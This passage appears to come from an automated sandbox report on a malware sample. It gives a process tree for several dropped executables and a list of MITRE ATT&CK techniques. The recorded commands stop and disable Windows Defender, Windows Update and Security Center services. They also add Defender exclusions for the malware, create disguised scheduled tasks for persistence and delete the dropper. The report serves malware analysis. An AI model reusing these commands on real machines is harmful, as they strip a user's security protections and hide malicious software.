  - - C:\Windows\system32\sc.exe
      sc stop WaasMedicSvc
      4⤵
      PID:5564
  - - C:\Windows\system32\sc.exe
      sc config WaasMedicSvc start= disabled
      4⤵
      PID:5992
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      PID:2248
  - - C:\Windows\system32\sc.exe
      sc config SecurityHealthService start= disabled
      4⤵
      PID:5520
  - - C:\Windows\system32\sc.exe
      sc stop SDRSVC
      4⤵
      PID:2812
  - - C:\Windows\system32\sc.exe
      sc config SDRSVC start= disabled
      4⤵
      PID:7008
  - - C:\Windows\system32\sc.exe
      sc stop wscsvc
      4⤵
      PID:4672
  - - C:\Windows\system32\sc.exe
      sc config wscsvc start= disabled
      4⤵
      PID:2136
  - - C:\Windows\system32\sc.exe
      sc stop WdiServiceHost
      4⤵
      PID:7048
  - - C:\Windows\system32\sc.exe
      sc config WdiServiceHost start= disabled
      4⤵
      PID:2180
  - - C:\Windows\system32\sc.exe
      sc stop WdiSystemHost
      4⤵
      PID:4244
  - - C:\Windows\system32\sc.exe
      sc config WdiSystemHost start= disabled
      4⤵
      PID:4708
  - - C:\Windows\system32\sc.exe
      sc stop InstallService
      4⤵
      PID:7060
  - - C:\Windows\system32\sc.exe
      sc config InstallService Start= disabled
      4⤵
      PID:6468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1A7F.exe" -Force
  2⤵
  PID:4252
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:5544
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:5328
- C:\Users\Admin\AppData\Local\Temp\1A7F.exe
  "C:\Users\Admin\AppData\Local\Temp\1A7F.exe"
  2⤵
  PID:6828
- C:\Users\Admin\AppData\Local\Temp\1A7F.exe
  "C:\Users\Admin\AppData\Local\Temp\1A7F.exe"
  2⤵
  PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1A7F.exe"
    3⤵
    PID:6424
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:900

C:\Users\Admin\AppData\Local\Temp\1B99.exe
C:\Users\Admin\AppData\Local\Temp\1B99.exe
1⤵
PID:7120
- C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c725f41a-2fea-49ff-8d90-bf99ef00ea0a\test.bat"
    3⤵
    PID:6840
  - - C:\Windows\system32\sc.exe
      sc stop windefend
      4⤵
      PID:2780
  - - C:\Windows\system32\sc.exe
      sc config windefend start= disabled
      4⤵
      PID:5152
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      PID:4480
  - - C:\Windows\system32\sc.exe
      sc config Sense start= disabled
      4⤵
      PID:6348
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      PID:3568
  - - C:\Windows\system32\sc.exe
      sc config wuauserv start= disabled
      4⤵
      PID:5428
  - - C:\Windows\system32\sc.exe
      sc stop usosvc
      4⤵
      PID:4896
  - - C:\Windows\system32\sc.exe
      sc config usosvc start= disabled
      4⤵
      PID:5944
  - - C:\Windows\system32\sc.exe
      sc stop WaasMedicSvc
      4⤵
      PID:6356
  - - C:\Windows\system32\sc.exe
      sc config WaasMedicSvc start= disabled
      4⤵
      PID:7004
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      PID:4408
  - - C:\Windows\system32\sc.exe
      sc config SecurityHealthService start= disabled
      4⤵
      PID:5860
  - - C:\Windows\system32\sc.exe
      sc stop SDRSVC
      4⤵
      PID:1644
  - - C:\Windows\system32\sc.exe
      sc config SDRSVC start= disabled
      4⤵
      PID:3996
  - - C:\Windows\system32\sc.exe
      sc stop wscsvc
      4⤵
      PID:3808
  - - C:\Windows\system32\sc.exe
      sc config wscsvc start= disabled
      4⤵
      PID:7140
  - - C:\Windows\system32\sc.exe
      sc stop WdiServiceHost
      4⤵
      PID:6920
  - - C:\Windows\system32\sc.exe
      sc config WdiServiceHost start= disabled
      4⤵
      PID:5148
  - - C:\Windows\system32\sc.exe
      sc stop WdiSystemHost
      4⤵
      PID:6696
  - - C:\Windows\system32\sc.exe
      sc config WdiSystemHost start= disabled
      4⤵
      PID:5456
  - - C:\Windows\system32\sc.exe
      sc stop InstallService
      4⤵
      PID:4876
  - - C:\Windows\system32\sc.exe
      sc config InstallService Start= disabled
      4⤵
      PID:4536
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1B99.exe" -Force
  2⤵
  PID:5152
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:6032
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:5616
- C:\Users\Admin\AppData\Local\Temp\1B99.exe
  "C:\Users\Admin\AppData\Local\Temp\1B99.exe"
  2⤵
  PID:6260
- C:\Users\Admin\AppData\Local\Temp\1B99.exe
  "C:\Users\Admin\AppData\Local\Temp\1B99.exe"
  2⤵
  PID:5824
- - C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
    3⤵
    PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      4⤵
      PID:5160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e1180006-9832-4c10-9542-9fc0fb6699b5\test.bat"
        5⤵
        
        PID:6612
      - C:\Windows\system32\sc.exe
        
        sc stop windefend
        6⤵
        
        PID:4708
      - C:\Windows\system32\sc.exe
        
        sc config windefend start= disabled
        6⤵
        
        PID:5140
      - C:\Windows\system32\sc.exe
        
        sc stop Sense
        6⤵
        
        PID:5960
      - C:\Windows\system32\sc.exe
        
        sc config Sense start= disabled
        6⤵
        
        PID:5320
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        
        PID:4688
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        
        PID:964
      - C:\Windows\system32\sc.exe
        
        sc stop usosvc
        6⤵
        
        PID:6844
      - C:\Windows\system32\sc.exe
        
        sc config usosvc start= disabled
        6⤵
        
        PID:7076
      - C:\Windows\system32\sc.exe
        
        sc stop WaasMedicSvc
        6⤵
        
        PID:4760
      - C:\Windows\system32\sc.exe
        
        sc config WaasMedicSvc start= disabled
        6⤵
        
        PID:6836
      - C:\Windows\system32\sc.exe
        
        sc stop SecurityHealthService
        6⤵
        
        PID:3896
      - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start= disabled
        6⤵
        
        PID:4300
      - C:\Windows\system32\sc.exe
        
        sc stop SDRSVC
        6⤵
        
        PID:7128
      - C:\Windows\system32\sc.exe
        
        sc config SDRSVC start= disabled
        6⤵
        
        PID:5852
      - C:\Windows\system32\sc.exe
        
        sc stop wscsvc
        6⤵
        
        PID:6660
      - C:\Windows\system32\sc.exe
        
        sc config wscsvc start= disabled
        6⤵
        
        PID:3652
      - C:\Windows\system32\sc.exe
        
        sc stop WdiServiceHost
        6⤵
        
        PID:3008
      - C:\Windows\system32\sc.exe
        
        sc config WdiServiceHost start= disabled
        6⤵
        
        PID:4128
      - C:\Windows\system32\sc.exe
        
        sc stop WdiSystemHost
        6⤵
        
        PID:6324
      - C:\Windows\system32\sc.exe
        
        sc config WdiSystemHost start= disabled
        6⤵
        
        PID:3324
      - C:\Windows\system32\sc.exe
        
        sc stop InstallService
        6⤵
        
        PID:5744
      - C:\Windows\system32\sc.exe
        
        sc config InstallService Start= disabled
        6⤵
        
        PID:7032
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" -Force
      4⤵
      PID:6920
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout 1
      4⤵
      PID:6248
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1136
  - - C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
      4⤵
      PID:200
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks.exe" /create /tn UpdateWindows /tr "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe" /st 01:25 /du 23:59 /sc daily /ri 1 /f
    3⤵
    - Creates scheduled task(s)
    PID:5992
- C:\Users\Admin\AppData\Local\Temp\1B99.exe
  "C:\Users\Admin\AppData\Local\Temp\1B99.exe"
  2⤵
  PID:4684
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 2096
  2⤵
  - Program crash
  PID:3888

C:\Users\Admin\AppData\Local\Temp\1DAE.exe
C:\Users\Admin\AppData\Local\Temp\1DAE.exe
1⤵
PID:4828
- C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  PID:4856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bf52f562-4394-4ea9-a5cf-2ca6293a11c9\test.bat"
    3⤵
    PID:6360
  - - C:\Windows\system32\sc.exe
      sc stop windefend
      4⤵
      PID:6804
  - - C:\Windows\system32\sc.exe
      sc config windefend start= disabled
      4⤵
      PID:6768
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      PID:5008
  - - C:\Windows\system32\sc.exe
      sc config Sense start= disabled
      4⤵
      PID:6972
  - - C:\Windows\system32\sc.exe
      sc stop wuauserv
      4⤵
      PID:2160
  - - C:\Windows\system32\sc.exe
      sc config wuauserv start= disabled
      4⤵
      PID:6120
  - - C:\Windows\system32\sc.exe
      sc stop usosvc
      4⤵
      PID:6428
  - - C:\Windows\system32\sc.exe
      sc config usosvc start= disabled
      4⤵
      PID:6976
  - - C:\Windows\system32\sc.exe
      sc stop WaasMedicSvc
      4⤵
      PID:5424
  - - C:\Windows\system32\sc.exe
      sc config WaasMedicSvc start= disabled
      4⤵
      PID:5872
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      PID:2884
  - - C:\Windows\system32\sc.exe
      sc config SecurityHealthService start= disabled
      4⤵
      PID:5700
  - - C:\Windows\system32\sc.exe
      sc stop SDRSVC
      4⤵
      PID:6284
  - - C:\Windows\system32\sc.exe
      sc config SDRSVC start= disabled
      4⤵
      PID:1200
  - - C:\Windows\system32\sc.exe
      sc stop wscsvc
      4⤵
      PID:5756
  - - C:\Windows\system32\sc.exe
      sc config wscsvc start= disabled
      4⤵
      PID:4116
  - - C:\Windows\system32\sc.exe
      sc stop WdiServiceHost
      4⤵
      PID:6320
  - - C:\Windows\system32\sc.exe
      sc config WdiServiceHost start= disabled
      4⤵
      PID:5004
  - - C:\Windows\system32\sc.exe
      sc stop WdiSystemHost
      4⤵
      PID:6152
  - - C:\Windows\system32\sc.exe
      sc config WdiSystemHost start= disabled
      4⤵
      PID:4620
  - - C:\Windows\system32\sc.exe
      sc stop InstallService
      4⤵
      PID:5788
  - - C:\Windows\system32\sc.exe
      sc config InstallService Start= disabled
      4⤵
      PID:6440
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1DAE.exe" -Force
  2⤵
  PID:6712
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:5976
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:4636
- C:\Users\Admin\AppData\Local\Temp\1DAE.exe
  "C:\Users\Admin\AppData\Local\Temp\1DAE.exe"
  2⤵
  PID:5732
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
    3⤵
    - Creates scheduled task(s)
    PID:5768
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 2080
  2⤵
  - Program crash
  PID:6296

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

BITS Jobs

T1197

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

BITS Jobs

Impair Defenses

Modify Registry

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery